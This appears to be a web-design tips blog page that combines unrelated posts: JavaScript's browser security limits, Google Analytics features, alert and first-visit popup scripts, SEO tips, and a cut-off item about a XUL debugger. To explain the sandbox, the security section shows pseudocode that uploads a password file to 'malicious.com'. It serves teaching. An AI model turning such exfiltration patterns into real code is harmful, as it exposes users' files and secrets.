Tryangled Solutions web designing tips tricks

Client–side JavaScript has expressly been developed for use in a web browser in conjunction with HTML pages. This has certain consequences for security.

First of all, please note carefully what happens when a user visits a JavaScript–enhanced web site:
The user asks for a certain HTML page without knowing whether it contains JavaScript. The HTML page is delivered to the browser, including the scripts. The scripts usually run automatically when the page loads or when the user takes a certain action. In general the user can’t do anything to stop the scripts (well, he could turn off JavaScript, but few end users know how to do this, or that it can be done, or that JavaScript exists).

So basically an innocent end user downloads a random program and allows it to be executed on his machine. Therefore there should be strict rules as to what this program can and cannot do.

1. JavaScript cannot read files from or write them to the file system on the computer. This would be a clear security hazard

filesystem.read(’/my/password/file’);
filesystem.write(’horridvirus.exe’);

2. JavaScript cannot execute any other programs. This would also be unacceptable

execute(’horridvirus.exe’)

3. JavaScript cannot establish any connection to whatever computer, except to download a new HTML page or to send mail. This, too, would create unacceptable hazards:

var security_hazard = connection.open(’malicious.com’);
security_hazard.upload(filesystem.read(’/my/password/file’));
security_hazard.upload(filesystem.read(’/ultra_secret/loans.xls’));

Thus JavaScript simply cannot do such dangerous things. Unfortunately Microsoft has seen fit to add some filesystem commands nonetheless, in combination with its ActiveX technology. This means that Explorer on Windows is structurally less safe than any other browser. It has some built–in protection, but hackers regularly find weaknesses. The first JavaScript virus I heard of works in such a way.

So JavaScript only works on things that are in HTML pages or part of the browser. You cannot influence anything that’s not contained by the browser. But even within the browser there are some no–go areas. Basically JavaScript wants to protect the privacy of the user by disallowing some actions and asking permission for others:

1. You cannot read out the history of the browser. Thus a malicious site owner cannot write a script that finds out where you surfed to recently.
You can go back or forward in the browsing history, but you cannot find out which page you’ll go to.
2. You cannot do anything in pages that come from another server. So if your frameset contains two pages from two servers, they cannot communicate with each other. Thus a malicious site owner cannot find out which sites you’ve opened in other browser windows. See the frame busting page for some more information.
3. You cannot set the value of a file upload field (<input type=”file”>).

document.forms[0].upload_field.value = ‘/my/password/file’;
document.forms[0].submit();

4. If you try to close a browser window that has not been opened by JavaScript, the user is asked to confirm this action.
However, this rule isn’t implemented in all browsers and is easy to work around in Explorer.
5. If you try to submit a form to a mail address by JavaScript, the user is asked to confirm this action.
6. You should not be able to open a new window smaller than 100×100 pixels and/or to position it outside the screen area of the computer. Thus a malicious site owner cannot spawn an invisible window.
Note that Explorer on Windows (and maybe other browsers, too) does allow this, contrary to safety regulations.

Thus JavaScript is a scripting language for influencing HTML elements, like forms, images, layers, paragraphs and such, and for influencing a few non–HTML objects like the browser window. Nothing more, but (most importantly) nothing less.

JavaScript is not a programming language in strict sense. Instead, it is a scripting language because it uses the browser to do the dirty work. If you command an image to be replaced by another one, JavaScript tells the browser to go do it. Because the browser actually does the work, you only need to pull some strings by writing some relatively easy lines of code. That’s what makes JavaScript an easy language to start with.

But don’t be fooled by some beginner’s luck: JavaScript can be pretty difficult, too. First of all, despite its simple appearance it is a full fledged programming language: it is possible to write quite complex programs in JavaScript. This is rarely necessary when dealing with web pages, but it is possible. This means that there are some complex programming structures that you’ll only understand after protracted studies.

Secondly, and more importantly, there are the browser differences. Though modern web browsers all support JavaScript, there is no sacred law that says they should support exactly the same JavaScript. A large part of this site is devoted to exploring and explaining these browser differences and finding ways to cope with them.

So basic JavaScript is easy to learn, but when you start writing advanced scripts browser differences (and occasionally syntactic problems) will creep up.

Although the names are much alike, JavaScript is primarily a scripting language for use within HTML pages, while Java is a real programming language that does quite different things from JavaScript. In addition Java is much harder to learn. It was developed by Sun for use in pretty much anything that needs some computing power.

JavaScript was developed by Brendan Eich, then working at Netscape, as a client side scripting language (even though there’s no fundamental reason why it can’t be used in a server side environment).

Originally the language was called Live Script, but when it was about to be released Java had become immensely popular (and slightly hypey). At the last possible moment Netscape changed the name of its scripting language to “JavaScript”. This was done purely for marketing reasons. Worse, Eich was ordered to “make it look like Java”. This has given rise to the idea that JavaScript is a “dumbed-down” version of Java. Unfortunately there’s not the slightest shred of truth in this story.

Java and JavaScript both descend from C and C++, but the languages (or rather, their ancestors) have gone in quite different directions. You can see them as distantly related cousins. Both are object oriented (though this is less important in JavaScript than in many other languages) and they share some syntax, but the differences are more important than the similarities.

If you are a C++ or Java programmer you will be surprised by some of JavaScript’s features. Since I don’t have any previous programming experience, the differences are not described on this site. The best you can do is buy David Flanagan, “JavaScript, the Definitive Guide”, 5th edition, O’Reilly, 2006. In this book the differences between C++/Java and JavaScript are clearly explained. I co–edited a few chapters of this book.

JavaScript is most commonly used as a client side scripting language. This means that JavaScript code is written into an HTML page. When a user requests an HTML page with JavaScript in it, the script is sent to the browser and it’s up to the browser to do something with it.

The fact that the script is in the HTML page means that your scripts can be seen and copied by whoever views your page. Nonetheless, to my mind this openness is a great advantage, because the flip side is that you can view, study and use any JavaScript you encounter on the WWW.

JavaScript can be used in other contexts than a Web browser. Netscape created server-side JavaScript as a CGI-language that can do roughly the same as Perl or ASP. There is no reason why JavaScript couldn’t be used to write real, complex programs. However, this site exclusively deals with the use of JavaScript in web browsers.

If you don’t have any programming experience at all it’s best to start with some gentle JavaScript examples that teach you the basics. It might be a good idea to buy Negrino & Smith, “JavaScript for the World Wide Web”, 4th edition, Peachpit Press, 2001. It contains some very useful examples and though it doesn’t treat advanced programming tricks, it will certainly help you get started. Of course this site also offers plenty of help.

I can also recommend Jeremy Keith, DOM Scripting: Web Design with JavaScript and the Document Object Model, 1st edition, Friends of Ed, 2005. This, too, is a book that doesn’t delve too deeply into technology, but gives non-programmers such as graphic designers/CSS wizards an excellent overview of the most common uses of JavaScript - as well as the most common problems.

Google Analytics is a great program that can do a lot more than most people realize. Here are a few features that you may not know about:

* Capture internal search stats. This is a newer feature of Google Analytics and a very nice one. Not only can you see what a visitor put into your internal search box, but what page they were on when they made the search and what page they chose in the search results. Any internal search will work as long as it passes the search variable through the URL. Here’s a short video interview with Google’s Brett Crosby on some of those features.

* Filter out domains. Let’s say your Google Analytics code somehow got on another site and your stats were getting tainted with irrelevant data. No problem. You can create a filter to not count anyone from specific domains you add in. Oddly enough, you can also filter out your own domain so your stats flat line. Not a good idea to do that though.

* Track document downloads or specific links. Adding a small piece of JavaScript to any link will tell Google to track when someone clicks on that link. This works for PDFs, Word documents, email address’ and external links. It also works if you want to see which two links on the same page are generating more clicks. Even though they go to the same URL, you can tag one link as ‘link one’ and the other as ‘link two’ and Google will track the clicks separately for you. Bonus Tip: If you have a Wordpress blog, you can instantly tag all links across your blog with the Ultimate Google Analytics plugin.

* Export to Excel. For any newbies, this is a time saving feature. Just about any report can have the data exported to a CSV file which Excel can open. You can now stop copying and pasting most data out of Google Analytics and into Excel and save yourself some time.

* Filter yourself out. This feature is a must do for any company. Find your static IP address and then set up a filter so Google knows not to include traffic from your company network. This ensures that your stats are not inflated due to employee’s surfing habits. This also is something you should consider for any partner companies. If you have a web development, or SEO company who is constantly checking out the site, filter them out too.

If you would like an alert box to display when your page loads, place the following code within the HTML of your web page between your <HEAD> and </HEAD> tags.

<script language=”Javascript”>
<!–
alert (”Alert Message”)
//–>
</script>

Change the text indicated in red to the message you would like to display.

Although you can use the above HTML code to display an alert box when your web page loads, please use it cautiously, as you don’t want to irritate your visitors.

You can use scripts within your pages to spice them up. However, although you will probably be tempted to use all the fancy techniques to create special effects, try not to go overboard. With each script or effect you add to your web page, it will take that much longer for your page to load.

Select your scripts carefully. Most browsers now support JavaScript, so using this type of script will probably be your best choice. Keep in mind, JavaScript and Java are two totally different languages and are not in any way connected.

If you must use Java on your site, use it sparingly. Java can be slow and has a tendency to crash browsers. It can also add a lot of time to your web page’s load time.
Scripts to Avoid When Designing a Professional Site

Pop up boxes asking for your visitor’s name

Disabling the browsers back button

Continuous alert messages

Scrolling messages in the status bar

Large scrolling text

Fancy cursors

Cursor trailers

Automatic transfers on mouseovers

Mouseover sounds

This list represents only a small portion of the types of scripts you should avoid. These scripts are not only very irritating, but they’re a big waste of your visitors’ time. If you want your visitors to return, use scripts that will compliment your web site.

It’s a proven fact that the use of popup windows is an effective marketing technique that produces great results. However, they can be very irritating to your visitors. How can you use this powerful marketing technique without offending your visitors? Compromise and use a popup window that only displays the first time your visitor enters your site.

Place the following code within the <BODY> of your web page.

<SCRIPT LANGUAGE=”JavaScript”>
<!–
function GetCookie(name) {
var arg=name+”=”;
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
while (i<clen) {
var j=i+alen;
if (document.cookie.substring(i,j)==arg)
return “here”;
i=document.cookie.indexOf(” “,i)+1;
if (i==0) break;
}
return null;
}
var visit=GetCookie(”COOKIE1″);
if (visit==null){
var expire=new Date();
window.name = “thiswin”;
newwin=open(”yourpage.htm”, “dispwin”,
“width=450,height=455,scrollbars=yes,
menubar=no”);
expire=new Date(expire.getTime()+7776000000);
document.cookie=”COOKIE1=here; expires=”+expire;
}
// –>
</SCRIPT>

Change the text where indicated in red.

The “yourpage.htm” text specifies the popup window url.

Change the height and width to your preferred window size.

For the purpose of these tips a search engine is something like google. It scans the web for sites to include in its index. It will follow links and find new sites all on its own. A directory (such as Yahoo or DMOZ) includes sites one at a time, with a human being looking at each site.

You can learn a lot about different types of search engines at Search Engine Watch.

# Put your keyword/key phrase in the title tag of your page. It can be the only thing there, or you can make a complete sentence out of it. The title is also what appears in your bookmarks list. So a good title will help people remember you when they bookmark your site.

# Google doesn’t care what you put in the description tag, but other engines do. Put in a sentence which tells the viewer why the heck they should visit your site. What’s in it for them?

# Google doesn’t care about what’s in your keywords tag, but the other engines might. Put in a few words and phrases appropriate to your page. Include common mis-spellings.

# Your primary keyword/phrase should appear in the headline at the top of your page.

# Skip the graphics and banners. Write a page that’s cool and interesting and is appropriate to your keywords. So if your keyword is cell phones write a cool, informative page about cell phones.

# Skip the java, javascript, heavy graphics, etc.

# Links to your page, either from your other pages or from other sites, should contain your keyword.

# Any graphics should have keywords in the alt tag. This will help describe the image.

# Links from your page should also contain your keywords.

# Don’t use your keywords too many times on a page. How do you tell? If your page starts to read badly, then you’ve used your keyword too many times. Links to your page count for far more than how many times your keywords appear.

It really begun at the last Copenhagen php-meetup; Joakim Nygård and Jacob Oettinger made a presentation of their project, WebCacheGrind. I casually mentioned something about having played with the dbgp-protocol (The debugging part of Xdebug) and that it ought to be simple enough to write a fontend for it. That prompted some snickering from the back row. Apparently some guys had this rule at their workingplace, that whomever said that something ought to be easy to do, had to do so himself.Spectator is a XUL application, which should make it cross platform. I have tinkered a bit with XUL before, but not a full application. If you’re wondering what XUL is, it’s the GUI toolkit, in which the frontends for Firefox and Thunderbird are written. It’s a markup language — much like HTML, which can be scripted with Javascript. This makes it very easy to work with. The only problem seems to be a rather …